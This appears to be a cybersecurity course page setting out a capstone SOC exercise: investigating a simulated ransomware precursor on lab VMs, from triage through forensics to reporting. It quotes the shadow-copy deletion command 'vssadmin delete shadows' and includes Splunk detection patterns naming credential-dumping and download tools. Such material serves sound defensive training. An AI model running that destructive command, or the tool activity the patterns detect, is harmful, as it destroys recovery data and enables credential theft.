0 / 14 steps complete
Advanced AI-Assisted Capstone

L20: Full SOC Simulation — Capstone Scenario

You're the on-call analyst. An alert fires at 2am. Work a complete SOC scenario from initial triage through containment, forensic investigation, threat intelligence enrichment, and executive reporting — using every VM and tool in your lab. This is the full kill-chain, end to end.

All Lab VMs Splunk Volatility 3 Wireshark YARA MITRE ATT&CK
SCENARIO BRIEF — READ FIRST
! Scenario: Operation Dark Autumn

Situation: It's 02:14 UTC on a Tuesday. Your Splunk SIEM fires a Priority-1 alert: "Potential ransomware pre-cursor — shadow copy deletion attempt detected on WEB01."

Environment:

  • Kali Linux (192.168.56.10) — your analyst workstation
  • SIFT Workstation (192.168.56.20) — forensics platform
  • Metasploitable (192.168.56.101) — simulates compromised WEB01
  • REMnux (malware-net) — isolated malware analysis environment

What you know so far:

  • Splunk alert triggered by Event ID 4688 — vssadmin delete shadows /all /quiet executed by user svc_backup
  • Source workstation: WEB01 (192.168.56.101)
  • Time: 02:07 UTC (7 minutes before you saw the alert)
  • svc_backup is a legitimate backup service account — but should NEVER run vssadmin

Your mission: Triage → Investigate → Contain → Hunt → Report. Complete all 14 steps and produce a full incident report.

Phase 1: Initial Triage (0–15 minutes)
1 Acknowledge alert and assess initial scope

First action — characterize the alert and determine if it's a true positive:

# Splunk — expand context around the triggering event index=wineventlog host=WEB01 earliest=-30m@m latest=now EventCode IN (4688, 4698, 4625, 4624, 4672, 7045) | eval time=strftime(_time, "%H:%M:%S") | table time, EventCode, Account_Name, Process_Name, Command_Line, Logon_Type | sort time # Quick check: has svc_backup ever run vssadmin before? index=wineventlog host=WEB01 Account_Name=svc_backup Command_Line="*vssadmin*" earliest=-90d@d | stats count by date_mday, Command_Line

Triage Decision

QuestionAnswer
True positive or false positive?
Was this the first such event?
Any other hosts affected?
Severity assessment
2 Splunk — build the attack timeline

Expand the investigation window — look for the full attack chain on WEB01:

# Look for what happened BEFORE the vssadmin command (precursor activity) index=wineventlog host=WEB01 earliest=-2h@h latest=+30m@m | eval suspicious=case( EventCode=4698, "Scheduled Task Created", EventCode=7045, "New Service Installed", match(Command_Line, "(?i)powershell.*-enc"), "Encoded PS", match(Command_Line, "(?i)(mimikatz|sekurlsa|lsadump)"), "Credential Dump", match(Command_Line, "(?i)vssadmin.*delete"), "Shadow Delete", match(Command_Line, "(?i)(net user|net localgroup)"), "Account Mgmt", match(Command_Line, "(?i)(curl|wget|certutil|bitsadmin).*http"), "Download", true(), null()) | where isnotnull(suspicious) | table _time, suspicious, Account_Name, Command_Line | sort _time # Also check for lateral movement FROM WEB01 index=wineventlog EventCode=4624 Logon_Type=3 Source_Network_Address=192.168.56.101 earliest=-4h@h | table _time, Account_Name, Workstation_Name, dest | sort _time
3 Network capture — identify C2 communications

From Kali, capture traffic and look for C2 beaconing patterns:

# Start tshark capture focused on WEB01 sudo tshark -i eth1 \ -f "host 192.168.56.101" \ -w ~/capstone/WEB01_traffic.pcap & # Analyze existing capture if available tshark -r ~/capstone/WEB01_traffic.pcap \ -Y "not arp and not dns" \ -T fields \ -e frame.time_epoch -e ip.src -e ip.dst \ -e tcp.dstport -e frame.len \ -E header=y -E separator=, \ | python3 -c " import sys, csv, collections reader = csv.DictReader(sys.stdin) dst_count = collections.Counter() for row in reader: key = f\"{row.get('ip.dst','')}:{row.get('tcp.dstport','')}\" dst_count[key] += 1 print('Top outbound connections from WEB01:') for dest, count in dst_count.most_common(15): print(f' {count:5d}x {dest}') " # Check for C2 beaconing (regular interval connections) python3 ~/network-lab/beacon_detect.py 2>/dev/null || \ echo "Run the beacon detection script from Lab L06 on WEB01_traffic.pcap"
FindingDetails
Suspicious outbound IP
Beacon interval detected
Total C2 connections
Phase 2: Containment (15–30 minutes)
4 Contain the compromised host

Isolate WEB01 while preserving evidence — do not shut it down yet (live memory needed):

# Option 1: Network isolation via firewall rule on Kali # Block all traffic from WEB01 except management channel sudo iptables -I FORWARD -s 192.168.56.101 -d ! 192.168.56.20 -j DROP sudo iptables -I FORWARD -d 192.168.56.101 -s ! 192.168.56.20 -j DROP # Option 2: If on VMware/VirtualBox — change network to host-only (no internet) # VBoxManage controlvm "WEB01" nic1 hostonly vboxnet0 # Verify isolation (should fail) ping -c 1 -W 2 192.168.56.101 # Document containment action in incident ticket echo "$(date -u) — WEB01 network-isolated. Traffic restricted to SIFT only." >> ~/capstone/incident_log.txt echo "$(date -u) — Analyst: $(whoami). Reason: Ransomware pre-cursor activity confirmed." >> ~/capstone/incident_log.txt
5 Acquire volatile memory from WEB01 (live forensics)

Capture RAM before any shutdown — this contains running processes, network connections, and encryption keys in memory:

# If WinPMem is available on WEB01: # On WEB01: winpmem_mini_x64_rc2.exe ~/capstone/WEB01_memory.raw # Simulate: use Volatility on an existing memory image # (Download a sample from volatility foundation or use one from your lab setup) ls ~/memory-lab/*.raw ~/memory-lab/*.vmem 2>/dev/null || \ echo "Memory image needed — see Lab L13 setup for acquisition steps" # Initial triage on memory image cd ~/memory-lab python3 vol.py -f evidence.raw windows.pslist.PsList | tee ~/capstone/pslist.txt python3 vol.py -f evidence.raw windows.netscan.NetScan | tee ~/capstone/netscan.txt python3 vol.py -f evidence.raw windows.malfind.Malfind | tee ~/capstone/malfind.txt echo "Memory triage complete" wc -l ~/capstone/*.txt
Phase 3: Deep Forensic Investigation (30–90 minutes)
6 Volatility — identify injected malicious code
# Volatility 3 — malware-specific investigation cd ~/memory-lab # Find suspicious processes (no parent, unusual paths) python3 vol.py -f evidence.raw windows.pstree.PsTree | \ grep -E "(cmd|powershell|wscript|cscript|mshta|regsvr32|rundll32)" # Find network connections from suspicious processes python3 vol.py -f evidence.raw windows.netscan.NetScan | \ grep -vE "(CLOSED|CLOSE_WAIT)" | \ grep -E "(ESTABLISHED|LISTENING)" # Dump injected memory regions from Malfind output # Get suspicious process PID from malfind output SUSPECT_PID=1234 # Replace with PID from malfind python3 vol.py -f evidence.raw -o ~/capstone/dumps/ \ windows.dumpfiles.DumpFiles --pid $SUSPECT_PID # Extract strings from dumped memory strings ~/capstone/dumps/*.dat | \ grep -iE "(http|https|cmd.exe|powershell|vssadmin|.onion|bitcoin)" | \ sort -u | tee ~/capstone/memory_strings.txt echo "Suspicious strings from memory:" head -30 ~/capstone/memory_strings.txt
7 Disk forensics — find malware dropper and persistence
# On SIFT — acquire and analyze WEB01 disk image # (In the lab, use the practice disk image from Lab L14) cd ~/disk-lab # Check Run/RunOnce keys for persistence python3 parse_registry.py # Look for recently modified executables in suspicious locations find ~/disk-lab/mount/Windows/Temp \ ~/disk-lab/mount/ProgramData \ ~/disk-lab/mount/Users/*/AppData/Roaming \ -name "*.exe" -newer ~/disk-lab/mount/Windows/System32/kernel32.dll \ 2>/dev/null | tee ~/capstone/suspicious_exes.txt echo "Recently dropped executables:" cat ~/capstone/suspicious_exes.txt # Check for new scheduled tasks find ~/disk-lab/mount/Windows/System32/Tasks -newer \ ~/disk-lab/mount/Windows/System32/kernel32.dll 2>/dev/null | head -20
8 Malware analysis — identify the ransomware family

On REMnux — analyze the dropped executable to identify the malware family:

# On REMnux (isolated malware-net) — copy sample via shared folder # Transfer sample from SIFT to REMnux # Static analysis file ~/capstone/malware_sample.exe sha256sum ~/capstone/malware_sample.exe | tee ~/capstone/sample_hash.txt # Extract strings (including deobfuscated) floss ~/capstone/malware_sample.exe > ~/capstone/floss_strings.txt 2>/dev/null || \ strings ~/capstone/malware_sample.exe > ~/capstone/floss_strings.txt # Check imports with pefile python3 << 'EOF' import pefile, sys, os exe = 'capstone/malware_sample.exe' if not os.path.exists(exe): print("Place malware sample at ~/capstone/malware_sample.exe") print("For the lab: use any sample EXE from your Lab L04 exercises") exit() pe = pefile.PE(exe) print("=== IMPORTS ===") for entry in pe.DIRECTORY_ENTRY_IMPORT: dll = entry.dll.decode('utf-8', errors='replace') apis = [imp.name.decode('utf-8', errors='replace') for imp in entry.imports if imp.name] print(f"\n{dll}") for api in apis[:10]: print(f" {api}") EOF # YARA scan against known malware rules yara -r ~/yara-lab/rules/04_ransomware.yar ~/capstone/malware_sample.exe 2>/dev/null yara -r ~/yara-lab/rule_sources/signature-base/yara/ ~/capstone/malware_sample.exe 2>/dev/null | head -20
Phase 4: Threat Intelligence & Hunting (90–120 minutes)
9 Enrich IOCs and identify threat actor
# Enrich all IOCs from this incident cd ~/tip-lab source ~/.tip_keys # Enrich C2 IP(s) python3 enrich_iocs.py << 'EOF' # Add your IOCs here ioc_list = [ {"value": "YOUR_C2_IP_HERE", "type": "ip"}, {"value": "YOUR_MALWARE_HASH_HERE", "type": "hash_sha256"}, ] EOF # Check if C2 IP maps to known threat actor infrastructure python3 -c " import subprocess, json c2_ip = '185.234.219.44' # Replace with your finding # Check Shodan for open ports and banners result = subprocess.run( ['curl', '-s', f'https://internetdb.shodan.io/{c2_ip}'], capture_output=True, text=True) data = json.loads(result.stdout) print(f'Shodan: {c2_ip}') print(f' Open ports: {data.get(\"ports\", [])}') print(f' Tags: {data.get(\"tags\", [])}') print(f' Vulns: {data.get(\"vulns\", [])}') "
IOCTypeRisk ScoreAttribution
IP
Hash
10 Threat hunt — search for lateral movement across all hosts
# Splunk — hunt for the same malware across other hosts # Look for same C2 IP, same malware hash, or same TTPs on other endpoints # Hunt 1: Any host communicating with C2 IP index=network dest_ip=185.234.219.44 | stats count by src_ip, dest_port | sort -count # Hunt 2: Same encoded PowerShell pattern on other hosts index=wineventlog EventCode=4688 NOT host=WEB01 (Command_Line="*-enc*" OR Command_Line="*EncodedCommand*") | stats count by host, Account_Name | sort -count # Hunt 3: vssadmin delete on any host index=wineventlog Command_Line="*vssadmin*delete*" | stats count by host, Account_Name, _time | sort _time # Hunt 4: YARA scan across endpoints (if using Velociraptor or osquery) # velociraptor -v artifacts collect Windows.Detection.Yara.Process \ # --args Rules="$(cat ~/yara-lab/rules/04_ransomware.yar)"
Phase 5: Eradication & Recovery (120–150 minutes)
11 Eradication — remove malware and persistence mechanisms

Document the eradication plan based on your forensic findings:

ArtifactLocationRemoval Action
12 Map full kill chain to MITRE ATT&CK
StageActivity ObservedATT&CK Technique
Initial Access
ExecutionT1059.001 — PowerShell
PersistenceT1053.005
Privilege Escalation
Defense EvasionEncoded PowerShellT1027 — Obfuscated Files
Credential AccessT1003 — Credential Dumping
Lateral Movement
Impactvssadmin delete shadowsT1490 — Inhibit Recovery
C2T1071.001 — Web Protocols
Phase 6: Reporting (150–180 minutes)
13 Write technical incident report

Use the AI analyst to help write your full technical report. Include all evidence, IOCs, and timeline.

Incident Summary

FieldValue
Incident ID
Detection time
Containment time
Malware family
Hosts confirmed compromised
Data encrypted
Root cause
IOCs (key)
14 Executive briefing and lessons learned

Present a 1-page executive summary and identify detection/prevention gaps. Ask the AI analyst to help draft the executive brief.

Lessons Learned

Gap IdentifiedRecommendationPriority

🎓 All 20 Labs Complete!

Congratulations — you've completed every lab in the CyberSec Pro Academy program.

← Back to All Labs
AI Senior SOC Analyst

Enter your Anthropic API key to activate the AI analyst:

Quick Prompts: